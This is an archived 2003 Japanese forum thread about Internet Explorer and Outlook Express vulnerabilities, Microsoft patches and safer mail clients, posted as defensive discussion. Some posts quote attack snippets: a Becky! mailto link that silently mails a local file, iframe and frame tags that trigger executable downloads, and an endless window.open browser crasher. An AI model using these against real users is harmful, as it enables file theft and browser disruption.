5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法

1 :スレ立て代理人:02/05/14 17:10
・IEの脆弱性とその対策
(最近ではKlez、以前はnimdaやBadtransウイルスの蔓延の一因になった)
・IEコンポーネントを使用してHTMLメールを表示するメーラなどの問題点と対策
(OutlookExpressやBecky!など)
・ウイルスに感染しない、蔓延させないためのよりよいメーラの使用方法

等を建設的に話し合いましょう。
各自のお使いのメーラーの推奨設定、使用方法、アンチウイルスソフトとの
連携方法なども提示していただけると非常にありがたいです。

このスレッドは、「Klez.E、Kleaz系スレッド Part2」からの派生スレです。
http://pc.2ch.net/test/read.cgi/sec/1021137509/

現時点の最新OE/IEバージョン・パッチ情報は>>2-10>>2-50

関連スレッド:
「IE5・5と6・0、ネット閲覧ソフトに欠陥」
http://pc.2ch.net/test/read.cgi/sec/1005605775/

410 :MS03-011:03/04/10 11:40
Microsoft VMにまたもや「緊急」のセキュリティ・ホール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030410/1/
MS03-011 に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-011ov.asp

411 :名無しさん@お腹いっぱい。:03/04/10 13:06
>>410
これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。

412 :名無しさん@お腹いっぱい。:03/04/16 10:07
米マイクロソフト,今後1年間のセキュリティの取り組みを明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030416/3/

413 :名無しさん@お腹いっぱい。:03/04/16 19:14
Windows Updateから修正パッチを適用できない問題が発覚,NTユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030416/1/

414 :MS03-013:03/04/17 08:18
「MS03-013: Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する (811493)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013ov.asp
影響を受けるソフトウェア
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP

415 :名無しさん@お腹いっぱい。:03/04/17 10:13
Windowsに「重要」のセキュリティ・ホール,一般ユーザーに管理者権限を奪われる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030417/1/

416 :山崎渉:03/04/17 11:59
(^^)

417 :名無しさん@お腹いっぱい。:03/04/17 12:38
age

418 :山崎渉:03/04/20 06:02
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

419 :名無しさん@お腹いっぱい。:03/04/20 21:17
sage

420 :名無しさん@お腹いっぱい。:03/04/21 18:10
>>414
のセキュリティパッチいれるとXpのIE6が使い物にならないくらい遅くなるから注意。
アンインストールで元に戻った。

421 :名無しさん@お腹いっぱい。:03/04/21 19:20
>>420
このあたりで報告されてるのと同じ?
http://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=237706&page=50

422 :名無しさん@お腹いっぱい。:03/04/21 21:28
>>421
俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。


423 :cheshire-cat ◆CATBCJABLA :03/04/21 21:55
>攻撃者が攻撃を行うには、直接コンソールで、またはターミナル セッションを介し、標的となるコンピュータに対話的にログオンできることが必要条件となります。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-013.asp

MS03-013って、当面の間は導入する必要性は薄いような予感。

424 :名無しさん@お腹いっぱい。:03/04/23 01:18
ここ面白かった

http://plaza16.mbn.or.jp/~satchel/


425 :名無しさん@お腹いっぱい。:03/04/23 11:13
>>410MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/
 ・Microsoft VMに「緊急」のセキュリティ・ホール
 ・Microsoft VMのサポートは2003年末まで
 ・トラブルが続出するWindows Update
 ・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
 ・ISA Serverにセキュリティ・ホール
 ・Indexing Server for Windows NT 4.0用パッチが公開
 ・TechNet Online セキュリティでは“月例”ドキュメント

426 :名無しさん@お腹いっぱい。:03/04/24 10:31
IEとOutlook Expressに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0304/24/nebt_06.html

427 :名無しさん@お腹いっぱい。:03/04/24 10:54
>>426
WindowsUpdateにあがっている。
MS03-015
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-015ov.asp
MS03-014
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-014ov.asp

428 :名無しさん@お腹いっぱい。:03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど
それはもう改善されてんの?
もうMS03-014あてても大丈夫?


429 :名無しさん@お腹いっぱい。:03/04/24 11:49
>>428
MS03-013では?>>420-423
MS03-014は公表されたばかりだが。

430 :名無しさん@お腹いっぱい。:03/04/24 11:50
間違えた!
MS03-014じゃなくてMS03-004だった。


MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803


431 :名無しさん@お腹いっぱい。:03/04/24 11:54
オペレーターとチャットで相談って使えんの?
今、初めて知ったんだけど。

432 :名無しさん@お腹いっぱい。:03/04/24 11:55
>>428
MS03-004だろ。>>365
改善されてないよ。

MS03-014にMS03-004の不具合の修正がされてればいいのだが、詳細不明。

433 :名無しさん@お腹いっぱい。:03/04/24 11:59
>>432
そうそれ。>>430

434 :名無しさん@お腹いっぱい。:03/04/24 12:13
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。

しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(>>423)、が吉。

もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。

435 :MS03-014,MS03-015:03/04/24 12:54
>>426-427関連
IEとOutlook Expressに「緊急」のセキュリティ・ホール,Windows Updateの実施を
任意のコードを実行させられる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/1/

436 :名無しさん@お腹いっぱい。:03/04/24 17:24
age

437 :MS03-007:03/04/24 17:46
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、脆弱性の調査をさらに続けた結果
Windows NT 4.0 についても同じ脆弱性が存在したため、Windows NT4.0
および Windows NT4.0 Terminal Server Edition 用の修正プログラム
の情報を追加しました。

Windows 2000と同じセキュリティ・ホールがWindows NTに,ただし深刻度は「重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/

438 :人柱は!!!!!!!!!:03/04/24 21:15
 

439 :名無しさん@お腹いっぱい。:03/04/24 21:27
>>438
自分でやれ。

440 :cheshire-cat ◆CATBCJABLA :03/04/24 22:54
MS03-013不具合 - パフォーマンス低下(XP SP1)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-013.asp


441 :名無しさん@お腹いっぱい。:03/04/25 10:56
age

442 :名無しさん@お腹いっぱい。:03/04/26 17:42
Sunの最新JavaランタイムがIEで使えないことが判明したんで
SunのをウンインスコしてMS-VMを最新にしたところ
セキュ確認済みの未認可AxtiveXが動かない
そこでサンドボックス限定で許可したらOK

とゆーことは

SunのプラグインはOSのセキュ設定レベル見てない
サイト鯖自体のセキュ区分で許可の有無はできるが
こういうあいまいな部分で素通しなのか
ネスケみてえだ

443 :名無しさん@お腹いっぱい。:03/05/02 13:39
「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/

444 :名無しさん@お腹いっぱい。:03/05/02 13:47
結局shurikenpro買ったよ

445 :名無しさん@お腹いっぱい。:03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。

http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16


65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!

mailto:2ch@2ch.net?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo

こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!


67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。

>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。

446 :名無しさん@お腹いっぱい。:03/05/03 17:43
だから最新パッチあててるOEの方が安全だってば。

447 :名無しさん@お腹いっぱい。:03/05/03 17:52
2.05.11キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

http://www.rimarts.co.jp/becky-j.htm

448 :名無しさん@お腹いっぱい。:03/05/07 14:07
>>440
ウィルスバスターがダメなんだと

449 :名無しさん@お腹いっぱい。:03/05/07 21:49
>>448
ソースは?

450 :名無しさん@お腹いっぱい。:03/05/12 17:06
IEとスクリプトの“危険な関係”(上)
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”(中)
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”(下)
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/

451 :動画直リン:03/05/12 17:10
http://homepage.mac.com/hitomi18/

452 :名無しさん@お腹いっぱい。:03/05/12 17:12
Opera for Windowsに新しいセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101

453 :名無しさん@お腹いっぱい。:03/05/15 23:43
Internet Explorerがfile:// リクエストの際にゾーンを無視する
http://www.symantec.com/region/jp/sarcj/security/content/7539.html

454 :名無しさん@お腹いっぱい。:03/05/16 00:56
>>453
うわっ またなんかすごいの来たー


455 :名無しさん@お腹いっぱい。:03/05/19 17:53
MSサポートを装うウイルスに注意
http://www.zdnet.co.jp/news/0305/19/njbt_03.html

IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/

米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html

456 :名無しさん@お腹いっぱい。:03/05/19 18:43
>>455
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる!
H系DLに紛れ込んで何でもやり放題?

457 :名無しさん@お腹いっぱい。:03/05/19 20:51
Hotfix出てないんかい

458 :cheshire-cat ◆CATBCJABLA :03/05/19 20:54
>>453
>>455
やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。

Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。

459 :名無しさん@お腹いっぱい。:03/05/19 22:05
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。

ここサンプルページ(要注意)
http://www.malware.com/forceframe.html

460 :yuis:03/05/19 22:06
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!

http://www.dvd-yuis.com/

461 :名無しさん@お腹いっぱい。:03/05/19 22:16
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。

462 :名無しさん@お腹いっぱい。:03/05/19 22:32
Opera使いの俺はだいじょうび

463 :cheshire-cat ◆CATBCJABLA :03/05/19 22:41
報告。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん!」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。


464 :cheshire-cat ◆CATBCJABLA :03/05/19 23:02
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。

下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。


465 :名無しさん@お腹いっぱい。:03/05/19 23:13
>>459
やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな?

466 :ぼるじょあ ◆yBEncckFOU :03/05/19 23:31
>>465
(・3・) エェー スラッシュ.に同じような報告あったYO


467 :名無しさん@お腹いっぱい。:03/05/19 23:50
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ



468 :名無しさん@お腹いっぱい。:03/05/21 02:39
Irvineのクリックキャッチを有効にしとくと
1個ずつしかダイアログが出なくなるから大丈夫げ

469 :山崎渉:03/05/22 02:01
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

470 :(≡゜♀゜≡)):03/05/22 02:38


471 :名無しさん@お腹いっぱい。:03/05/24 11:45
>>453 >>459 のFixまだ無いの?

472 :名無しさん@お腹いっぱい。:03/05/28 12:06
またもやパッチに不具合,すべてのパッチをアンインストール可能に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/

473 :名無しさん@お腹いっぱい。:03/05/28 13:34
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴
溜まってるのに。。

474 :m:03/05/28 16:06
◎ちょっと見て見て!!◎
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

475 :名無しさん@お腹いっぱい。:03/05/28 16:45
そろそろ新OS出すために
バグをちらほらと小出しにしてる感じだな

476 :名無しさん@お腹いっぱい。:03/05/29 00:11
age

477 :名無しさん@お腹いっぱい。:03/05/29 10:21
最善の対策:MSOE使うな。

--------------------------終了----------------------------

478 :名無しさん@お腹いっぱい。:03/05/29 12:16
>>477
では、お勧めのメーラは?

479 :名無しさん@お腹いっぱい。:03/05/29 13:27
>>478
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。

480 :名無しさん@お腹いっぱい。:03/05/29 19:20
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと
まずいんですか?

481 :名無しさん@お腹いっぱい。:03/05/29 20:07
>>480
DonutPはIEコンポーネントブラウザです

482 :名無しさん@お腹いっぱい。:03/05/29 20:12
>>481
まずいってことですね?
イマイチその言葉の意味がよくわからんで、、、

パッチ当てて出直してきます。

483 :名無しさん@お腹いっぱい。:03/06/02 21:31
>>440関連
Windows XPでパフォーマンスに悪影響を与えるパッチの改訂版が登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030602/1/

484 :名無しさん@お腹いっぱい。:03/06/02 21:34
MS03-019 今回の更新内容
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp

Windows NT/2000のセキュリティ・ホールの深刻度が,より深刻な「重要」に変更
 リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/

485 :名無しさん@お腹いっぱい。:03/06/03 09:28
HTMLメールはやめよう
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030530/2/

486 :名無しさん@お腹いっぱい。:03/06/03 09:38
OEは常にウイルスのターゲットになるからやめとけ

>>478
Edmaxフリー版とか

>>479
どうやってメモ帳をメーラーとして使うんだよ


487 :名無しさん@お腹いっぱい。:03/06/03 10:35
>>485
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。

完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可

488 :名無しさん@お腹いっぱい。:03/06/03 11:59
>>485
HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。

489 :名無しさん@お腹いっぱい。:03/06/03 13:18
>>486
>どうやってメモ帳をメーラーとして使うんだよ

電信8号

490 :名無しさん@お腹いっぱい。:03/06/03 16:17
EdMAXはメッセージを来たままの状態で保存しないから、糞。

491 :名無しさん@お腹いっぱい。:03/06/04 10:19
Microsoft,「IE 6 SP1が独立した最後のWebブラウザ」と語る
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm

492 :名無しさん@お腹いっぱい。:03/06/04 10:38
先生方よろしくお願いします。
メールソフトは outlook expressを使用していますが
受信メール、送信メールが全て無くなっています。
何日か前にブラクラ踏んでしまい、その後受信メールだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信メール+送信メールが無くなって
いました。
原因は先日踏んだブラクラなのでしょうか?
そしてほっておくとまたこのような事がおきるのでしょうか?
良きアドバイスお願いします。


493 :_:03/06/04 10:44
http://homepage.mac.com/hiroyuki43/jaz09.html

494 :名無しさん@お腹いっぱい。:03/06/04 10:45
>>492
諦めて、OEを再インスコすれ
その際にウィルススキャンするのも忘れずに

495 :名無しさん@お腹いっぱい。:03/06/04 10:53
>>492
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。

ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?

496 :名無しさん@お腹いっぱい。:03/06/04 11:38
>>494>>495さん
ありがとうございました

497 :MS03-020:03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

498 :MS03-020:03/06/05 09:25
●修正プログラム
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe

・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe

注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。

・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe

(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。

499 :名無しさん@お腹いっぱい。:03/06/05 13:16
>>497-498
IEに2種類の危険なセキュリティ・ホール,任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
(1)Objectタグの処理に関するセキュリティ・ホール
(2)ファイルのダウンロード・ダイアログに関するセキュリティ・ホール

500 :名無しさん@お腹いっぱい。:03/06/05 13:37
新たに2つ「緊急」の脆弱性、MSがIE用の累積パッチを公開
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ(MS03-020)を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html



501 :名無しさん@お腹いっぱい。:03/06/05 15:01
>>498 って >>455
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"

のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?

>>453 のゾーン無視の方はどうなってるのだろ。。。


502 :名無しさん@お腹いっぱい。:03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?

503 :名無しさん@お腹いっぱい。:03/06/05 15:41
>>501, >>501
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。

504 :名無しさん@お腹いっぱい。:03/06/05 15:47
>>503
さんきゅです

505 :名無しさん@お腹いっぱい。:03/06/05 16:14
>>502
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ

506 :名無しさん@お腹いっぱい。:03/06/05 16:22
>>505
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。

507 :名無しさん@お腹いっぱい。:03/06/05 16:23
あ! マイコンピューターもちゃんと視野に入ってるのね >>502

508 :502:03/06/05 16:31
>>507
そうでぃ〜す! いずれにしても、レスありがとうございます。

まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。

509 :名無しさん@お腹いっぱい。:03/06/05 16:42
>>508
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。

<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>

510 :負け犬502:03/06/05 16:56
>>509
さっそくやってみました。たしかに出ました、ダイアログが!
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。

511 :名無しさん@お腹いっぱい。:03/06/05 23:34
「ファイル交換ソフトで感染を広げるウイルスの届け出数が急増中」――IPA
ブラウザ・クラッシャによる被害も増加中,設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/

コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html

512 :名無しさん@お腹いっぱい。:03/06/06 10:39
メール機能を悪用する主なウイルス一覧
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日:2003年 6月 5日

513 :名無しさん@お腹いっぱい。:03/06/07 00:27
age

514 :名無しさん@お腹いっぱい。:03/06/09 22:49
age

515 :とも:03/06/09 22:51
みてね〜♪
http://www1.free-city.net/home/s-rf9/page002.html

516 :名無しさん@お腹いっぱい。:03/06/10 12:42
>>485
【結果発表】HTMLメールをどう思いますか?
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030609/1/

517 :名無しさん@お腹いっぱい。:03/06/10 14:16
【川崎憲次郎投手をオールスターに!】

ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html



      

518 :名無しさん@お腹いっぱい。:03/06/15 23:10
セキュリティ・ホールを修正した「Opera7.11 for Windows 日本語版」が公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/

519 :名無しさん@お腹いっぱい。:03/06/16 11:12
>>518
スレ違いだろ。

520 :名無しさん@お腹いっぱい。:03/06/17 01:59
MS03-020って烈しく無意味なのですが・・
http://www.malware.com/forceframe.html

521 :名無しさん@お腹いっぱい。:03/06/17 02:09
>>520
Operaもだめみたい
mozillaは大丈夫

522 :名無しさん@お腹いっぱい。:03/06/17 09:34
>>520氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。

523 :名無しさん@お腹いっぱい。:03/06/17 10:17
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!

524 :名無しさん@お腹いっぱい。:03/06/17 10:49
>>520
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。

大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。

525 :名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか?
更新しようとしても、98についの説明がありません。

それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか?
壊れ始めているよ〜だ! SOS, SOS, , ,

526 :名無しさん@お腹いっぱい。:03/06/17 13:29
>>525
Win98は今月末までのサポート。
Windows板http://pc2.2ch.net/win/

マウスの件はマウスを買い換えろ。壊れてるだけ。
念のためウィルススキャンしろ。

527 :名無しさん@お腹いっぱい。:03/06/17 13:40
おっ、Piggybackで止まった


528 :_:03/06/17 13:57
http://homepage.mac.com/hiroyuki44/

529 :名無しさん@お腹いっぱい。:03/06/17 16:12
>>522
>>459で既出のサンプルページだろ。
>>520も一言説明して貼るべきとは思うが・・・。

530 :名無しさん@お腹いっぱい。:03/06/17 17:52
直リンもやめるべきだろう。
>>520のメール欄を見る限りは確信犯。

531 :名無しさん@お腹いっぱい。:03/06/17 23:34
age

532 :名無しさん@お腹いっぱい。:03/06/18 09:59
IEの新しい累積パッチにはいくつかの注意点,既に適用したユーザーも再確認を
 既知のホールを解消できるものの不完全,ブラウザ・クラッシャは回避できない
 今週のSecurity Check [Windows編] (第97回,2003年6月18日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030617/1/

533 :名無しさん@お腹いっぱい。:03/06/18 21:14
Microsoft的にはブラクラは優先的に対処すべきセキュリティホール
として扱われていないから仕方ないだろ
while (1) { window.open() }とか
<img src="mailto:sage">…(えんえんと続く)とか
<input type>とか
http://msgs.securepoint.com/cgi-bin/get/bugtraq0303/107.html とか
単にブラウザが落ちるだけのものならいくらでもある

534 :名無しさん@お腹いっぱい。:03/06/19 00:16
あげ

535 :n:03/06/19 00:21
☆頑張ってまーす!!☆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

536 :名無しさん@お腹いっぱい。:03/06/19 14:07
>>533
OSごと落ちる9x系
MS的には「昔そんなのありましたっけ?さっさとXP買ってね」

まあ優先は他の穴だとは思うけどさ

537 :名無しさん@お腹いっぱい。:03/06/19 21:34
>>526
どうもありがとう。行って来ました。

538 :名無しさん@お腹いっぱい。:03/06/19 22:13
Win2k/XPなら制限付きユーザーでブラウズすると、
IEが危険とされる理由のひとつである、「勝手にバイナリを
ダウンロードして実行したりインストールしたりする機能」が
署名の有無やゾーンにかかわらず完全に無効になるから
かなり安全になる。

539 :名無しさん@お腹いっぱい。:03/06/20 00:30
age

540 :名無しさん@お腹いっぱい。:03/06/22 20:27
あげ

541 :名無しさん@お腹いっぱい。:03/06/23 01:32
  _, ._
  ( ゚ Д゚)
  ( つ O   ガシャ
  と_)_)  __
       (__()、;.o:。
         ゚*・:.。


542 :名無しさん@お腹いっぱい。:03/06/25 19:27
age

543 :名無しさん@お腹いっぱい。:03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp
●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP

544 :名無しさん@お腹いっぱい。:03/06/26 23:24
IEブラウザに新たな欠陥:米マイクロソフトは「調査中」
http://japan.cnet.com/news/ent/story/0,2000047623,20057501,00.htm

545 :IE5.5SP2日本語版:03/06/27 00:44
IE5.5SP2のダウンロードは終了したはずだが、
Internet Explorer 5.5 SP2 ダウンロード提供終了のご案内
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
なぜかダウンロードが復活しているので、必要な方はいまのうちにどうぞ。
http://www.microsoft.com/downloads/details.aspx?FamilyID=0a50996b-deb9-4a46-81da-abef1ebbd08a&DisplayLang=ja

